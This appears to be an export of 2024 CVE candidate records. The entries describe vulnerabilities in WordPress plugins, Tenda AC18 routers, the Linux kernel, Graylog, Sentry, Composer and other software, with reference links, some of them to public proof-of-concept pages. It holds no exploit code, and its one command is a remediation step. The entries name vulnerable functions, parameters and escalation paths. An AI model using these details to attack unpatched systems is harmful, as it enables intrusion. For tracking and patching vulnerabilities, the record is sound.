CVE    2024    24870    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Dempfle Advanced iFrame allows Stored XSS. This issue affects Advanced iFrame: from n/a through 2023.10.    MISC:https://patchstack.com/database/vulnerability/advanced-iframe/wordpress-advanced-iframe-plugin-2023-10-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/advanced-iframe/wordpress-advanced-iframe-plugin-2023-10-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    2487    Candidate    A vulnerability was found in Tenda AC18 15.03.05.05. It has been declared as critical. This vulnerability affects the function formSetDeviceName of the file /goform/SetOnlineDevName. The manipulation of the argument devName/mac leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256894 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256894 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256894   |   MISC:VDB-256894 | Tenda AC18 SetOnlineDevName formSetDeviceName stack-based overflow   |   URL:https://vuldb.com/?id.256894   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetDeviceName_devName.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetDeviceName_devName.md    Assigned (20240315)
CVE    2024    24868    Candidate    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Smartypants SP Project & Document Manager. This issue affects SP Project & Document Manager: from n/a through 4.69.    MISC:https://patchstack.com/database/vulnerability/sp-client-document-manager/wordpress-sp-project-document-manager-plugin-4-69-contributor-sql-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/sp-client-document-manager/wordpress-sp-project-document-manager-plugin-4-69-contributor-sql-injection-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24867    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Osamaesh WP Visitor Statistics (Real Time Traffic). This issue affects WP Visitor Statistics (Real Time Traffic): from n/a through 6.9.4.    MISC:https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-stats-manager-plugin-6-9-4-sensitive-data-exposure-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-stats-manager-plugin-6-9-4-sensitive-data-exposure-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24866    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Reflected XSS. This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24.    MISC:https://patchstack.com/database/vulnerability/biteship/wordpress-biteship-plugin-2-2-24-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/biteship/wordpress-biteship-plugin-2-2-24-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24865    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Noah Kagan Scroll Triggered Box allows Stored XSS. This issue affects Scroll Triggered Box: from n/a through 2.3.    MISC:https://patchstack.com/database/vulnerability/dreamgrow-scroll-triggered-box/wordpress-scroll-triggered-box-plugin-2-3-cross-site-scripting-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/dreamgrow-scroll-triggered-box/wordpress-scroll-triggered-box-plugin-2-3-cross-site-scripting-vulnerability?_s_id=cve    Assigned (20240201)
CVE    2024    24864    Candidate    A race condition was found in the Linux kernel's media/dvb-core in dvbdmx_write() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.    MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8178   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8178    Assigned (20240201)
CVE    2024    24861    Candidate    A race condition was found in the Linux kernel's media/xc4000 device driver in the xc4000_get_frequency() function. This can result in a return value overflow issue, possibly leading to malfunction or a denial of service issue.    MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8150   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8150    Assigned (20240201)
CVE    2024    24860    Candidate    A race condition was found in the Linux kernel's bluetooth device driver in {min,max}_key_size_set() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.    MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8151   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8151    Assigned (20240201)
CVE    2024    2486    Candidate    A vulnerability was found in Tenda AC18 15.03.05.05. It has been classified as critical. This affects the function formQuickIndex of the file /goform/QuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256893 was assigned to this vulnerability.    MISC:VDB-256893 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256893   |   MISC:VDB-256893 | Tenda AC18 QuickIndex formQuickIndex stack-based overflow   |   URL:https://vuldb.com/?id.256893   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formQuickIndex.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formQuickIndex.md    Assigned (20240315)
CVE    2024    24859    Candidate    A race condition was found in the Linux kernel's net/bluetooth in sniff_{min,max}_interval_set() function. This can result in a bluetooth sniffing exception issue, possibly leading to denial of service.    MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8153   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8153    Assigned (20240201)
CVE    2024    24858    Candidate    A race condition was found in the Linux kernel's net/bluetooth in {conn,adv}_{min,max}_interval_set() function. This can result in an L2CAP connection or broadcast abnormality issue, possibly leading to denial of service.    MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8154   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8154    Assigned (20240201)
CVE    2024    24857    Candidate    A race condition was found in the Linux kernel's net/bluetooth device driver in conn_info_{min,max}_age_set() function. This can result in integrity overflow issue, possibly leading to bluetooth connection abnormality or denial of service.    MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8155   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8155    Assigned (20240201)
CVE    2024    24855    Candidate    A race condition was found in the Linux kernel's scsi device driver in lpfc_unregister_fcf_rescan() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.    MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8149   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8149    Assigned (20240201)
CVE    2024    24850    Candidate    Missing Authorization vulnerability in Mark Stockton Quicksand Post Filter jQuery Plugin. This issue affects Quicksand Post Filter jQuery Plugin: from n/a through 3.1.1.    MISC:https://patchstack.com/database/vulnerability/quicksand-jquery-post-filter/wordpress-quicksand-post-filter-jquery-plugin-3-1-1-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/quicksand-jquery-post-filter/wordpress-quicksand-post-filter-jquery-plugin-3-1-1-broken-access-control-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    2485    Candidate    A vulnerability was found in Tenda AC18 15.03.05.05 and classified as critical. Affected by this issue is the function formSetSpeedWan of the file /goform/SetSpeedWan. The manipulation of the argument speed_dir leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256892. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256892 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256892   |   MISC:VDB-256892 | Tenda AC18 SetSpeedWan formSetSpeedWan stack-based overflow   |   URL:https://vuldb.com/?id.256892   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/SetSpeedWan.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/SetSpeedWan.md    Assigned (20240315)
CVE    2024    24849    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Mark Stockton Quicksand Post Filter jQuery Plugin. This issue affects Quicksand Post Filter jQuery Plugin: from n/a through 3.1.1.    MISC:https://patchstack.com/database/vulnerability/quicksand-jquery-post-filter/wordpress-quicksand-post-filter-jquery-plugin-3-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/quicksand-jquery-post-filter/wordpress-quicksand-post-filter-jquery-plugin-3-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24848    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MJS Software PT Sign Ups – Beautiful volunteer sign ups and management made easy allows Stored XSS. This issue affects PT Sign Ups – Beautiful volunteer sign ups and management made easy: from n/a through 1.0.4.    MISC:https://patchstack.com/database/vulnerability/ptoffice-sign-ups/wordpress-pt-sign-ups-plugin-1-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/ptoffice-sign-ups/wordpress-pt-sign-ups-plugin-1-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24847    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jgadbois CalculatorPro Calculators allows Reflected XSS. This issue affects CalculatorPro Calculators: from n/a through 1.1.7.    MISC:https://patchstack.com/database/vulnerability/calculatorpro-calculators/wordpress-calculatorpro-calculators-plugin-1-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/calculatorpro-calculators/wordpress-calculatorpro-calculators-plugin-1-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24846    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MightyThemes Mighty Addons for Elementor allows Reflected XSS. This issue affects Mighty Addons for Elementor: from n/a through 1.9.3.    MISC:https://patchstack.com/database/vulnerability/mighty-addons/wordpress-mighty-addons-for-elementor-plugin-1-9-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/mighty-addons/wordpress-mighty-addons-for-elementor-plugin-1-9-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24845    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Sewpafly Post Thumbnail Editor. This issue affects Post Thumbnail Editor: from n/a through 2.4.8.    MISC:https://patchstack.com/database/vulnerability/post-thumbnail-editor/wordpress-post-thumbnail-editor-plugin-2-4-8-unauthenticated-sensitive-data-exposure-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/post-thumbnail-editor/wordpress-post-thumbnail-editor-plugin-2-4-8-unauthenticated-sensitive-data-exposure-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24843    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in PowerPack Addons for Elementor PowerPack Pro for Elementor. This issue affects PowerPack Pro for Elementor: from n/a before 2.10.8.    MISC:https://patchstack.com/database/vulnerability/powerpack-elements/wordpress-powerpack-pro-for-elementor-plugin-2-10-8-csrf-leading-to-plugin-settings-change-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/powerpack-elements/wordpress-powerpack-pro-for-elementor-plugin-2-10-8-csrf-leading-to-plugin-settings-change-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24841    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan's Art Add Customer for WooCommerce allows Stored XSS. This issue affects Add Customer for WooCommerce: from n/a through 1.7.    MISC:https://patchstack.com/database/vulnerability/add-customer-for-woocommerce/wordpress-add-customer-for-woocommerce-plugin-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/add-customer-for-woocommerce/wordpress-add-customer-for-woocommerce-plugin-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24840    Candidate    Missing Authorization vulnerability in BdThemes Element Pack Elementor Addons. This issue affects Element Pack Elementor Addons: from n/a through 5.4.11.    MISC:https://patchstack.com/database/vulnerability/bdthemes-element-pack-lite/wordpress-element-pack-elementor-addons-plugin-5-4-11-broken-access-control-on-duplicate-post-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/bdthemes-element-pack-lite/wordpress-element-pack-elementor-addons-plugin-5-4-11-broken-access-control-on-duplicate-post-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24839    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc allows Stored XSS. This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.6.1.    MISC:https://patchstack.com/database/vulnerability/structured-content/wordpress-structured-content-json-ld-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/structured-content/wordpress-structured-content-json-ld-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24838    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Five Star Plugins Five Star Restaurant Reviews allows Stored XSS. This issue affects Five Star Restaurant Reviews: from n/a through 2.3.5.    MISC:https://patchstack.com/database/vulnerability/good-reviews-wp/wordpress-five-star-restaurant-reviews-plugin-2-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/good-reviews-wp/wordpress-five-star-restaurant-reviews-plugin-2-3-5-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24837    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Frédéric GILLES FG PrestaShop to WooCommerce, Frédéric GILLES FG Drupal to WordPress, Frédéric GILLES FG Joomla to WordPress. This issue affects FG PrestaShop to WooCommerce: from n/a through 4.44.3; FG Drupal to WordPress: from n/a through 3.67.0; FG Joomla to WordPress: from n/a through 4.15.0.    MISC:https://patchstack.com/database/vulnerability/fg-drupal-to-wp/wordpress-fg-drupal-to-wordpress-plugin-3-67-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/fg-drupal-to-wp/wordpress-fg-drupal-to-wordpress-plugin-3-67-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   MISC:https://patchstack.com/database/vulnerability/fg-joomla-to-wordpress/wordpress-fg-joomla-to-wordpress-plugin-4-15-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/fg-joomla-to-wordpress/wordpress-fg-joomla-to-wordpress-plugin-4-15-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   MISC:https://patchstack.com/database/vulnerability/fg-prestashop-to-woocommerce/wordpress-fg-prestashop-to-woocommerce-plugin-4-44-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/fg-prestashop-to-woocommerce/wordpress-fg-prestashop-to-woocommerce-plugin-4-44-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24836    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Audrasjb GDPR Data Request Form allows Stored XSS. This issue affects GDPR Data Request Form: from n/a through 1.6.    MISC:https://patchstack.com/database/vulnerability/gdpr-data-request-form/wordpress-gdpr-data-request-form-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/gdpr-data-request-form/wordpress-gdpr-data-request-form-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24835    Candidate    Missing Authorization vulnerability in realmag777 BEAR. This issue affects BEAR: from n/a through 1.1.4.    MISC:https://patchstack.com/database/vulnerability/woo-bulk-editor/wordpress-bear-plugin-1-1-4-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/woo-bulk-editor/wordpress-bear-plugin-1-1-4-broken-access-control-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24834    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net allows Stored XSS. This issue affects BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net: from n/a through 1.1.4.    MISC:https://patchstack.com/database/vulnerability/woo-bulk-editor/wordpress-bear-plugin-1-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/woo-bulk-editor/wordpress-bear-plugin-1-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24832    Candidate    Missing Authorization vulnerability in Metagauss EventPrime. This issue affects EventPrime: from n/a through 3.3.9.    MISC:https://patchstack.com/database/vulnerability/eventprime-event-calendar-management/wordpress-eventprime-plugin-3-3-9-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/eventprime-event-calendar-management/wordpress-eventprime-plugin-3-3-9-broken-access-control-vulnerability?_s_id=cve    Assigned (20240131)
CVE    2024    24830    Candidate    OpenObserve is an observability platform built specifically for logs, metrics, traces, analytics, designed to work at petabyte scale. A vulnerability has been identified in the "/api/{org_id}/users" endpoint. This vulnerability allows any authenticated regular user ('member') to add new users with elevated privileges, including the 'root' role, to an organization. This issue circumvents the intended security controls for role assignments. The vulnerability resides in the user creation process, where the payload does not validate the user roles. A regular user can manipulate the payload to assign root-level privileges. This vulnerability leads to Unauthorized Privilege Escalation and significantly compromises the application's role-based access control system. It allows unauthorized control over application resources and poses a risk to data security. All users, particularly those in administrative roles, are impacted. This issue has been addressed in release version 0.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/openobserve/openobserve/security/advisories/GHSA-hfxx-g56f-8h5v   |   URL:https://github.com/openobserve/openobserve/security/advisories/GHSA-hfxx-g56f-8h5v    Assigned (20240131)
CVE    2024    2483    Candidate    A vulnerability, which was classified as problematic, has been found in Surya2Developer Hostel Management Service 1.0. This issue affects some unknown processing of the file /change-password.php of the component Password Change Handler. The manipulation of the argument oldpassword leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256889 was assigned to this vulnerability.    MISC:VDB-256889 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.256889   |   MISC:VDB-256889 | Surya2Developer Hostel Management Service Password Change change-password.php cross-site request forgery   |   URL:https://vuldb.com/?id.256889   |   MISC:https://github.com/blackslim3/cve_sidequest/blob/main/poc/CSRF%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md   |   URL:https://github.com/blackslim3/cve_sidequest/blob/main/poc/CSRF%20on%20Hostel%20Management%20System%20using%20PHP%20and%20MySQL%201.0.md    Assigned (20240315)
CVE    2024    24829    Candidate    Sentry is an error tracking and performance monitoring platform. Sentry’s integration platform provides a way for external services to interact with Sentry. One of such integrations, the Phabricator integration (maintained by Sentry) with version <=24.1.1 contains a constrained SSRF vulnerability. An attacker could make Sentry send POST HTTP requests to arbitrary URLs (including internal IP addresses) by providing an unsanitized input to the Phabricator integration. However, the body payload is constrained to a specific format. If an attacker has access to a Sentry instance, this allows them to: 1. interact with internal network; 2. scan local/remote ports. This issue has been fixed in Sentry self-hosted release 24.1.2, and has already been mitigated on sentry.io on February 8. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/getsentry/self-hosted/releases/tag/24.1.2   |   URL:https://github.com/getsentry/self-hosted/releases/tag/24.1.2   |   MISC:https://github.com/getsentry/sentry/pull/64882   |   URL:https://github.com/getsentry/sentry/pull/64882   |   MISC:https://github.com/getsentry/sentry/security/advisories/GHSA-rqxh-fp9p-p98r   |   URL:https://github.com/getsentry/sentry/security/advisories/GHSA-rqxh-fp9p-p98r    Assigned (20240131)
CVE    2024    24828    Candidate    pkg is a tool designed to bundle Node.js projects into executables. Any native code packages built by `pkg` are written to a hardcoded directory. On unix systems, this is `/tmp/pkg/*` which is a shared directory for all users on the same local system. There is no uniqueness to the package names within this directory, they are predictable. An attacker who has access to the same local system has the ability to replace the genuine executables in the shared directory with malicious executables of the same name. A user may then run the malicious executable without realising it has been modified. This package is deprecated. Therefore, there will not be a patch provided for this vulnerability. To check if your executable built by pkg depends on native code and is vulnerable, run the executable and check if `/tmp/pkg/` was created. Users should transition to actively maintained alternatives. We would recommend investigating Node.js 21’s support for single executable applications. Given the decision to deprecate the pkg package, there are no official workarounds or remediations provided by our team. Users should prioritize migrating to other packages that offer similar functionality with enhanced security.    MISC:https://github.com/vercel/pkg/security/advisories/GHSA-22r3-9w55-cj54   |   URL:https://github.com/vercel/pkg/security/advisories/GHSA-22r3-9w55-cj54   |   MISC:https://nodejs.org/api/single-executable-applications.html   |   URL:https://nodejs.org/api/single-executable-applications.html    Assigned (20240131)
CVE    2024    24827    Candidate    Discourse is an open source platform for community discussion. Without a rate limit on the POST /uploads endpoint, it makes it easier for an attacker to carry out a DoS attack on the server since creating an upload can be a resource intensive process. Do note that the impact varies from site to site as various site settings like `max_image_size_kb`, `max_attachment_size_kb` and `max_image_megapixels` will determine the amount of resources used when creating an upload. The issue is patched in the latest stable, beta and tests-passed version of Discourse. Users are advised to upgrade. Users unable to upgrade should reduce `max_image_size_kb`, `max_attachment_size_kb` and `max_image_megapixels` as smaller uploads require less resources to process. Alternatively, `client_max_body_size` can be reduced in Nginx to prevent large uploads from reaching the server.    MISC:https://github.com/discourse/discourse/commit/003b80e62f97cd8c0114d6b9d3f93c10443e6fae   |   URL:https://github.com/discourse/discourse/commit/003b80e62f97cd8c0114d6b9d3f93c10443e6fae   |   MISC:https://github.com/discourse/discourse/security/advisories/GHSA-58vw-246g-fjj4   |   URL:https://github.com/discourse/discourse/security/advisories/GHSA-58vw-246g-fjj4    Assigned (20240131)
CVE    2024    24826    Candidate    Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An out-of-bounds read was found in Exiv2 version v0.28.1. The vulnerable function, `QuickTimeVideo::NikonTagsDecoder`, was new in v0.28.0, so Exiv2 versions before v0.28 are _not_ affected. The out-of-bounds read is triggered when Exiv2 is used to read the metadata of a crafted video file. In most cases this out of bounds read will result in a crash. This bug is fixed in version v0.28.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/Exiv2/exiv2/pull/2337   |   URL:https://github.com/Exiv2/exiv2/pull/2337   |   MISC:https://github.com/Exiv2/exiv2/security/advisories/GHSA-g9xm-7538-mq8w   |   URL:https://github.com/Exiv2/exiv2/security/advisories/GHSA-g9xm-7538-mq8w    Assigned (20240131)
CVE    2024    24825    Candidate    DIRAC is a distributed resource framework. In affected versions any user could get a token that has been requested by another user/agent. This may expose resources to unintended parties. This issue has been addressed in release version 8.0.37. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/DIRACGrid/DIRAC/commit/f9ddab755b9a69acb85e14d2db851d8ac0c9648c   |   URL:https://github.com/DIRACGrid/DIRAC/commit/f9ddab755b9a69acb85e14d2db851d8ac0c9648c   |   MISC:https://github.com/DIRACGrid/DIRAC/security/advisories/GHSA-59qj-jcjv-662j   |   URL:https://github.com/DIRACGrid/DIRAC/security/advisories/GHSA-59qj-jcjv-662j    Assigned (20240131)
CVE    2024    24824    Candidate    Graylog is a free and open log management platform. Starting in version 2.0.0 and prior to versions 5.1.11 and 5.2.4, arbitrary classes can be loaded and instantiated using a HTTP PUT request to the `/api/system/cluster_config/` endpoint. Graylog's cluster config system uses fully qualified class names as config keys. To validate the existence of the requested class before using them, Graylog loads the class using the class loader. If a user with the appropriate permissions performs the request, arbitrary classes with 1-arg String constructors can be instantiated. This will execute arbitrary code that is run during class instantiation. In the specific use case of `java.io.File`, the behavior of the internal web-server stack will lead to information exposure by including the entire file content in the response to the REST request. Versions 5.1.11 and 5.2.4 contain a fix for this issue.    MISC:https://github.com/Graylog2/graylog2-server/blob/e458db8bf4f789d4d19f1b37f0263f910c8d036c/graylog2-server/src/main/java/org/graylog2/rest/resources/system/ClusterConfigResource.java#L208-L214   |   URL:https://github.com/Graylog2/graylog2-server/blob/e458db8bf4f789d4d19f1b37f0263f910c8d036c/graylog2-server/src/main/java/org/graylog2/rest/resources/system/ClusterConfigResource.java#L208-L214   |   MISC:https://github.com/Graylog2/graylog2-server/commit/75ef2b8d60e7d67f859b79fe712c8ae7b2e861d8   |   URL:https://github.com/Graylog2/graylog2-server/commit/75ef2b8d60e7d67f859b79fe712c8ae7b2e861d8   |   MISC:https://github.com/Graylog2/graylog2-server/commit/7f8ef7fa8edf493106d5ef6f777d4da02c5194d9   |   URL:https://github.com/Graylog2/graylog2-server/commit/7f8ef7fa8edf493106d5ef6f777d4da02c5194d9   |   MISC:https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-p6gg-5hf4-4rgj   |   URL:https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-p6gg-5hf4-4rgj    Assigned (20240131)
CVE    2024    24823    Candidate    Graylog is a free and open log management platform. Starting in version 4.3.0 and prior to versions 5.1.11 and 5.2.4, reauthenticating with an existing session cookie would re-use that session id, even if for different user credentials. In this case, the pre-existing session could be used to gain elevated access to an existing Graylog login session, provided the malicious user could successfully inject their session cookie into someone else's browser. The complexity of such an attack is high, because it requires presenting a spoofed login screen and injection of a session cookie into an existing browser, potentially through a cross-site scripting attack. No such attack has been discovered. Graylog 5.1.11 and 5.2.4, and any versions of the 6.0 development branch, contain patches to not re-use sessions under any circumstances. Some workarounds are available. Using short session expiration and explicit log outs of unused sessions can help limit the attack vector. Unpatched, this vulnerability exists, but is relatively hard to exploit. A proxy could be leveraged to clear the `authentication` cookie for the Graylog server URL for the `/api/system/sessions` endpoint, as that is the only one vulnerable.    MISC:https://github.com/Graylog2/graylog2-server/commit/1596b749db86368ba476662f23a0f0c5ec2b5097   |   URL:https://github.com/Graylog2/graylog2-server/commit/1596b749db86368ba476662f23a0f0c5ec2b5097   |   MISC:https://github.com/Graylog2/graylog2-server/commit/b93a66353f35a94a4e8f3f75ac4f5cdc5a2d4a6a   |   URL:https://github.com/Graylog2/graylog2-server/commit/b93a66353f35a94a4e8f3f75ac4f5cdc5a2d4a6a   |   MISC:https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-3xf8-g8gr-g7rh   |   URL:https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-3xf8-g8gr-g7rh    Assigned (20240131)
CVE    2024    24822    Candidate    Pimcore's Admin Classic Bundle provides a backend user interface for Pimcore. Prior to version 1.3.3, an attacker can create, delete etc. tags without having the permission to do so. A fix is available in version 1.3.3. As a workaround, one may apply the patch manually.    MISC:https://github.com/pimcore/admin-ui-classic-bundle/commit/24660b6d5ad9cbcb037a48d4309a6024e9adf251   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/commit/24660b6d5ad9cbcb037a48d4309a6024e9adf251   |   MISC:https://github.com/pimcore/admin-ui-classic-bundle/pull/412   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/pull/412   |   MISC:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-3rfr-mpfj-2jwq   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-3rfr-mpfj-2jwq    Assigned (20240131)
CVE    2024    24821    Candidate    Composer is a dependency Manager for the PHP language. In affected versions several files within the local working directory are included during the invocation of Composer and in the context of the executing user. As such, under certain conditions arbitrary code execution may lead to local privilege escalation, provide lateral user movement or malicious code execution when Composer is invoked within a directory with tampered files. All Composer CLI commands are affected, including composer.phar's self-update. The following scenarios are of high risk: Composer being run with sudo, Pipelines which may execute Composer on untrusted projects, Shared environments with developers who run Composer individually on the same project. This vulnerability has been addressed in versions 2.7.0 and 2.2.23. It is advised that the patched versions are applied at the earliest convenience. Where not possible, the following should be addressed: Remove all sudo composer privileges for all users to mitigate root privilege escalation, and avoid running Composer within an untrusted directory, or if needed, verify that the contents of `vendor/composer/InstalledVersions.php` and `vendor/composer/installed.php` do not include untrusted code. A reset can also be done on these files by the following: `rm vendor/composer/installed.php vendor/composer/InstalledVersions.php` and then `composer install --no-scripts --no-plugins`.    MISC:https://github.com/composer/composer/commit/64e4eb356b159a30c766cd1ea83450a38dc23bf5   |   URL:https://github.com/composer/composer/commit/64e4eb356b159a30c766cd1ea83450a38dc23bf5   |   MISC:https://github.com/composer/composer/security/advisories/GHSA-7c6p-848j-wh5h   |   URL:https://github.com/composer/composer/security/advisories/GHSA-7c6p-848j-wh5h    Assigned (20240131)
